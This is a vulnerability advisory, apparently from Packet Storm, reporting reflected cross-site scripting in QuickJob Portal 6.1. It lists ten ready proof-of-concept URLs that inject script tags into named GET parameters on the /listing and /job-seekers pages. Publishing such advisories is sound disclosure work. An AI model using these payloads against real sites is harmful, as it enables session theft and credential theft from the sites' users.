Security
Headlines
HeadlinesLatestCVEs

Headline

QuickJob Portal 6.1 Cross Site Scripting

QuickJob Portal version 6.1 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#vulnerability#web#auth

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack… ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://quickjob.bylancer.com/ │
│ Vendor : Bylancer │
│ Software : QuickJob Portal 6.1 │
│ Vuln Type: Reflected XSS │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim’s │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

     CryptoJob (Twitter) twitter.com/0x0CryptoJob

 ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  

┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /listing

GET parameter ‘keywords’ is vulnerable to RXSS

https://website/listing?keywords=tep81%3C%2ftitle%3E%3Cscript%3Ealert(1)%3C%2fscript%3Exjo44

Path: /listing

GET parameter ‘location’ is vulnerable to RXSS

https://website/listing?location=dlg48%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3eqlwm9

Path: /listing

GET parameter ‘filter’ is vulnerable to RXSS

https://website/listing?filter=mi7td%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eqggg0

Path: /listing

GET parameter ‘sort’ is vulnerable to RXSS

https://website/listing?sort=Newestvxmqa%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edxybf

Path: /listing

GET parameter ‘order’ is vulnerable to RXSS

https://website/listing?order=DESCpmkh0%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edsavh

Path: /listing

GET parameter ‘custom%5B8%5D’ is vulnerable to RXSS

https://website/listing?keywords=&location=&placetype=&placeid=&cat=&subcat=&filter=&sort=Newest&order=DESC&job-type=4&salary-type=5&range1=11&range2=999&custom%5B8%5D=12b3r6d%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebojt4

Path: /job-seekers

GET parameter ‘age_range1’ is vulnerable to RXSS

https://website/job-seekers?age_range1=11grn6r%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ev1w8f

Path: /job-seekers

GET parameter ‘age_range2’ is vulnerable to RXSS

https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999pkqe0%22%3e%3cscript%3ealert(1)%3c%2fscript%3evbpy9&range1=22&range2=33&gender=Male

Path: /job-seekers

GET parameter ‘range1’ is vulnerable to RXSS

https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22aafr9%22%3e%3cscript%3ealert(1)%3c%2fscript%3etdi3d&range2=33&gender=Male

Path: /job-seekers

GET parameter ‘range2’ is vulnerable to RXSS

https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22&range2=33onppz%22%3e%3cscript%3ealert(1)%3c%2fscript%3ee0x0x&gender=Male

[-] Done

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution